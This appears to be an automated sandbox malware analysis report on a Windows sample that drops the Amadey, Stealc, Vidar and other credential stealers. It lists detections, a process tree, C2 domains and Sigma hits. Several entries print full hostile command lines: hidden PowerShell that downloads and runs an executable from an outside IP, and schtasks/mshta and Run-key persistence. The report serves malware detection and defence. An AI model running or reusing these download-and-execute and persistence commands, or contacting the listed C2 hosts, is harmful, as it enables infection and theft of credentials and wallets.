Windows Analysis Report
M6gQuZPvgY.exe

Overview

General Information

Sample name: M6gQuZPvgY.exe (renamed because the original name is a hash value)
Original sample name: d9f00ea479721f7581810bda98dca097.exe
Analysis ID: 1639961
MD5: d9f00ea479721f7581810bda98dca097
SHA1: 0b438eab56eb426d68bdeb2bd7c6f69af19daca6
SHA256: 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1
Tags: exe, user-abuse_ch

Detection

Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadey's Clipper DLL
Yara detected LummaC Stealer
Yara detected Mars stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates HTA files
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Potentially malicious time measurement code found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • M6gQuZPvgY.exe (PID: 2112 cmdline: "C:\Users\user\Desktop\M6gQuZPvgY.exe" MD5: D9F00EA479721F7581810BDA98DCA097)
    • rapes.exe (PID: 1972 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: D9F00EA479721F7581810BDA98DCA097)
  • rapes.exe (PID: 5424 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: D9F00EA479721F7581810BDA98DCA097)
  • rapes.exe (PID: 7596 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: D9F00EA479721F7581810BDA98DCA097)
    • amnew.exe (PID: 5800 cmdline: "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe" MD5: 22892B8303FA56F4B584A04C09D508D8)
      • futors.exe (PID: 3456 cmdline: "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe" MD5: 22892B8303FA56F4B584A04C09D508D8)
        • trano1221.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe" MD5: F70D82388840543CAD588967897E5802)
          • trano1221.exe (PID: 2064 cmdline: "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe" MD5: F70D82388840543CAD588967897E5802)
        • cronikxqqq.exe (PID: 4780 cmdline: "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe" MD5: AB09D0DB97F3518A25CD4E6290862DA7)
          • cronikxqqq.exe (PID: 5388 cmdline: "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe" MD5: AB09D0DB97F3518A25CD4E6290862DA7)
          • WerFault.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 888 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • UD49QH6.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe" MD5: 65982D78F4862DD0FAAF93D7BEF348EC)
    • m0wsoI3.exe (PID: 5132 cmdline: "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" MD5: 599E5D1EEA684EF40FC206F71B5D4643)
      • cmd.exe (PID: 5888 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6872 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • 8e933e9d51.exe (PID: 7232 cmdline: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" MD5: F043914DC1106C2CE233F6FA23AE2C9F)
      • cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7392 cmdline: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 7256 cmdline: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 2520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4232 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5144 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • cmd.exe (PID: 5232 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 1812 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2880 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 1568 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 2360 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • schtasks.exe (PID: 2196 cmdline: schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 2460 cmdline: mshta "C:\Temp\J9hHfTRUK.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 3204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • c1f0508103.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe" MD5: D5D7ED1F1BFE9A359ED87B37C22E3D59)
  • futors.exe (PID: 5404 cmdline: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe MD5: 22892B8303FA56F4B584A04C09D508D8)
  • mshta.exe (PID: 5916 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 3564 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\J9hHfTRUK.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • 8e933e9d51.exe (PID: 668 cmdline: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" MD5: F043914DC1106C2CE233F6FA23AE2C9F)
    • cmd.exe (PID: 4524 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6220 cmdline: schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 4548 cmdline: mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 6248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7500 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["codxefusion.top", "hardswarehub.today", "gadgethgfub.icu", "hardrwarehaven.run", "techmindzs.live", "quietswtreams.life", "techspherxe.top"], "Build id": "CRON--@CRONLOGS"}
{"C2 url": "ctrlgem.xyz/gate.php"}
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Yara matches on dropped files (Source; Rule; Description; Author; Strings):
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe; Rule: JoeSecurity_MarsStealer; Description: Yara detected Mars stealer; Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe; Rule: JoeSecurity_Amadey_3; Description: Yara detected Amadey's Clipper DLL; Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe; Rule: JoeSecurity_MarsStealer; Description: Yara detected Mars stealer; Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exe; Rule: JoeSecurity_Amadey_3; Description: Yara detected Amadey's Clipper DLL; Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exe; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
(5 further entries not shown)
Yara matches on memory dumps (Source; Rule; Description; Author; Strings):
Source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security
Source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmp; Rule: Windows_Trojan_Vidar_114258d5; Description: unknown; Author: unknown
  • 0xcc38:$a2: *wallet*.dat
  • 0xd558:$b1: CC\%s_%s.txt
  • 0xdb60:$b2: History\%s_%s.txt
  • 0xd880:$b3: Autofill\%s_%s.txt
Source: 00000031.00000002.1772447973.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_LummaCStealer_4; Description: Yara detected LummaC Stealer; Author: Joe Security
Source: 00000011.00000002.1518189012.000000000043C000.00000040.00000001.01000000.0000000E.sdmp; Rule: JoeSecurity_MarsStealer; Description: Yara detected Mars stealer; Author: Joe Security
(32 further entries not shown)
Yara matches on unpacked PE files (Source; Rule; Description; Author; Strings):
Source: 48.2.cronikxqqq.exe.3c89550.0.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 48.0.cronikxqqq.exe.870000.0.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 17.2.m0wsoI3.exe.400000.0.unpack; Rule: JoeSecurity_Vidar_1; Description: Yara detected Vidar stealer; Author: Joe Security
Source: 17.2.m0wsoI3.exe.400000.0.unpack; Rule: JoeSecurity_MarsStealer; Description: Yara detected Mars stealer; Author: Joe Security
Source: 17.2.m0wsoI3.exe.400000.0.unpack; Rule: JoeSecurity_Stealc; Description: Yara detected Stealc; Author: Joe Security
(16 further entries not shown)
Yara matches on AMSI script buffers (Source; Rule; Description; Author; Strings):
Source: amsi32_2520.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi64_8000.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi32_3204.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi32_6248.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, ParentProcessId: 7232, ParentProcessName: 8e933e9d51.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7248, ProcessName: cmd.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8e933e9d51.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, ParentProcessId: 7232, ParentProcessName: 8e933e9d51.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ProcessId: 7256, ProcessName: mshta.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, ParentProcessId: 7232, ParentProcessName: 8e933e9d51.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ProcessId: 7256, ProcessName: mshta.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8e933e9d51.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2520, TargetFilename: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
